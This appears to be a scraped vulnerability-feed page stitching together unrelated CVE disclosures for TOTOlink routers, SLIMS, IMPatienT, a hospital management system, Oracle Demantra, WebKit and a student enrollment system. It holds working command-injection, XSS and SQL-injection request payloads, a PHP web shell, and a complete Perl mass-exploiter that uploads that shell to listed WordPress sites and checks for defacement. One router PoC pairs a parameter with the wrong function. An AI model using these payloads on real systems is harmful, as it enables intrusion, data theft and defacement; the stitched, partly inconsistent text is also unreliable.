TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取username参数中的内容传递给v51，之后将v51带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"username":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48126: ttt/12 at main · Am1ngl/ttt

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the dayvalid parameter in the setting/delStaticDhcpRules function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取dayvalid参数中的内容传递给v9，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"dayvalid":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48122: ttt/17 at main · Am1ngl/ttt

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: E-Business Collections).  Supported versions that are affected are 12.1 and  12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand Management.  Successful attacks of this vulnerability can result in  unauthorized creation, deletion or modification access to critical data or all Oracle Demantra Demand Management accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).

CVE-2023-21850: Oracle Critical Patch Update Advisory - January 2023

IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.

A Security Advisory has been raised for IMPatienT v1.5.0 (CVE-2023-23637):

Description:  
IMPatienT v1.5.0 allows Stored Cross-Site Scripting (XSS) via onmouseover in certain text fields within a PATCH /modify\_onto request.  
This may allow attackers to steal Protected Health Information (PHI).

Suggested Fix:  
Consider sanitizing user input parameters by removing all non-compliant characters. Additionally, you could consider encoding the user input using HTML or URL methods.

Reference:  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23637  
https://nvd.nist.gov/vuln/detail/CVE-2023-23637  
https://owasp.org/www-project-top-ten/2017/A7\_2017-Cross-Site\_Scripting\_(XSS)

Payload:

    PATCH /modify_onto HTTP/1.1
    Host: 127.0.0.1:5000
    Content-Length: 2218
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
    Origin: http://127.0.0.1:5000/
    Referer: http://127.0.0.1:5000/ontocreate
    Connection: close
    
    [{"id":"MHO:000001","text":"Sample Keyword","icon":true,"li_attr":{"id":"MHO:000001"},"a_attr":{"href":"#","id":"MHO:000001_anchor"},"state":{"loaded":true,"opened":true,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"Sample Keyword","hex_color":"#c7ef34","hpo_datamined":"","correlates_with":"","image_annotation":false},"parent":"#"},{"id":"MHO:000004","text":"Keyword Image Annotation","icon":true,"li_attr":{"id":"MHO:000004"},"a_attr":{"href":"#","id":"MHO:000004_anchor"},"state":{"loaded":true,"opened":false,"selected":true,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"UNCLEAR","gene_datamined":"N/A","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#77e3a4","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000005","text":"Keyword Image Annotation 2<a onmouseover=alert('XSS')>XSS</a>","icon":true,"li_attr":{"id":"MHO:000005"},"a_attr":{"href":"#","id":"MHO:000005_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":true,"hex_color":"#094f6a","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000002","text":"Sample Keyword Child","icon":true,"li_attr":{"id":"MHO:000002"},"a_attr":{"href":"#","id":"MHO:000002_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#14cd17","hpo_datamined":""},"parent":"MHO:000001"},{"id":"MHO:000003","text":"Sample Keyword Child 2","icon":true,"li_attr":{"id":"MHO:000003"},"a_attr":{"href":"#","id":"MHO:000003_anchor"},"state":{"loaded":true,"opened":false,"selected":false,"disabled":false},"data":{"description":"","synonymes":"","phenotype_datamined":"","gene_datamined":"","alternative_language":"","correlates_with":"","image_annotation":false,"hex_color":"#d9eab9","hpo_datamined":""},"parent":"MHO:000001"}]

CVE-2023-23637: [Security] IMPatienT v1.5.0 Stored Cross-Site Scripting (XSS) - CVE-2023-23637 · Issue #101 · lambda-science/IMPatienT

TOTOlink A7100RU V7.4cu.2313_B20191024 is vulnerable to Command Injection Vulnerability in the httpd service. An attacker can obtain a stable root shell through a specially constructed payload.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取rsabits参数下的内容传递给v8，之后带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/delStaticDhcpRules",
"rsabits":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-47853: ttt/16 at main · Am1ngl/ttt

Hospital Management System v1.0 is vulnerable to SQL Injection. Attackers can gain administrator privileges without the need for a password.

**CVE Disclosures**

Author: Frank Zeng

**The CVE ID for the entry： **CVE-2022-46093****

**A prose description:** SQL injection vulnerability in Hospital Management System via **a crafted POST request** to /Hospital-Management-System-master/func3.php.

**Root Cause and Impact:** Although the user name is restricted on the front page of the administrator login, the password is not effectively restricted and validated, allowing the attacker to use the vulnerable code for sql injection attacks. The sql statement executed on the server is as follows: select \* from admintb where username='admin@admin.com' and password='1' or username='admin';

Then,attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

**The name of an affected Product:** Hospital Management System

**The affected or fixed version:** v1.0

**Vendors:** https://github.com/kishan0725/Hospital-Management-System

**Vulnerability Type:** SQL Injection of Post Type

**Payload:** username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**HTTP Request:**

POST /Hospital-Management-System-master/func3.php HTTP/1.1
Host: localhost
Content-Length: 77
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Hospital-Management-System-master/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=99cunoplmskd7cjgrmp5l9unbt
Connection: close

username1=admin%40admin.com&password2=1%27+or+username%3D%27admin&adsub=Login

**Vulnerability url:** /Hospital-Management-System-master/index.php

**Vulnerability location:** /Hospital-Management-System-master/fun3.php

**Proof：**

**Supplementary information：**

**The attack process of manually entering the payload in the login box:**

The sql statement executed on the server is as follows: select \* from admintb where username='admin' and password='1' or username='admin';

Enter in the User Name column of the login box: **admin@admin.com** Enter in the Password column of the login box: **1' or username='admin**

**Request package**：Bypass checking the password

At this time, the password authentication is bypassed and the administrator account is successfully logged in.

Attackers can use the administrator permission to steal the information of hospitals, doctors, and patients, and perform some privileged operations, such as managing doctors.

CVE-2022-46093: z-vulnerabilitys/Hospital-Management-System.md at main · Frank-Z7/z-vulnerabilitys

WebKit suffers from a RenderMathMLToken use-after-free vulnerability in CSSCrossfadeValue::crossfadeChanged.

WebKit CSSCrossfadeValue::crossfadeChanged Use-After-Free

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

=================================================================================================  
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |  
| # Author    : indoushka                                                                       |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            |   
| # Vendor    : https://www.sliderrevolution.com/                                               |    
| # Dork      : index off revslider\backup                                                      |    
                plugins/revslider/public/assets/css/settings.css                                |  
                revslider.php "index of"                                                      |                                    
                wp-content/plugins/revslider/ 2013                                              |  
=================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to upload backdoor through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]  
  Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl

 use LWP::UserAgent;

 system(($^O eq 'MSWin32') ? 'cls' : 'clear');

 head();

 my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";  
die "$usage" unless $ARGV[0];

 open(tarrget,"<$ARGV[0]") or die "$!";  
while(<tarrget>){  
chomp($_);  
$target = $_;

 my $path = "wp-admin/admin-ajax.php";

 print "\nTarget => $target\n";

 my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");  
my $req = $ua->get("$target/$path");  
if($req->is_success) {  
print "\n  [+] Xploit Possibility Work :3\n \n";

   print "  [*] Try Exploiting Vulnerability\n";  
print "  [*] Xploiting $target\n";

 my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

 print "  [*] Sent payload\n";

 if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "  [+] Payload successfully executed\n";

 print "  [*] Checking if shell was uploaded\n";  
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;  
if($check =~/<br>/) {

     print "  [+] Shell successfully uploaded\n";  
    open(save, '>>Shell.txt');  
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";  
    close(save);

  print "  [*] Checking if Deface was uploaded now\n";

 my $def = $ua->get("$target/leet.html")->content;  
if($def = ~/Hacked/) {

 print "  [+] Deface uploaded successfull\n";

  } else {print "   [-] Deface not Uploaded :/"; }  
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }  
} else {  
print "  [-] Payload failed: Fail\n";  
print "\n";

 }  
} else { print "\n [-]Xploit Fail \n"}

 sub head {  
print "\t   +===============================================\n";  
print "\t   | Auto Exploiter Revslider Shell Upload \n";  
print "\t   | Edited: indoushka\n";  
print "\t   +===============================================\n";  
}  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

WordPress Slider Revolution 4.x.x Shell Upload

Online Student Enrollment System v1.0 was discovered to contain a SQL injection vulnerability via the username parameter at /student_enrollment/admin/login.php.

**Online Student Enrollment System v1.0 by donbermoy has SQL injection**

BUG\_Author:XueYing Li

vendors:https://www.sourcecodester.com/php/14281/online-student-enrollment-system-using-phpmysqli.html

Vulnerability File: /student\_enrollment/admin/login.php

Parameter "username" (POST), exists SQL injection vulnerability

Payload1:username=1%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 31
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27&password=2&login=
    

An error page

Payload2:username=1%27%27&password=2&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Content-Length: 34
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/student_enrollment/admin/login.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=bi7132qp84261ga80u4umo124d
    Connection: close
    
    username=1%27%27&password=2&login=
    

An right page

Payload3:username=a'%2b(select\*from(select(sleep(20)))a)%2b'&password=b&login=

    POST /student_enrollment/admin/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=argh74f67q09vjd4k7088q9sji
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/student_enrollment/admin/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 69
    
    username=a'%2b(select*from(select(sleep(20)))a)%2b'&password=b&login=
    

sleep(20) The server response time is 20 seconds

Tag

#webkit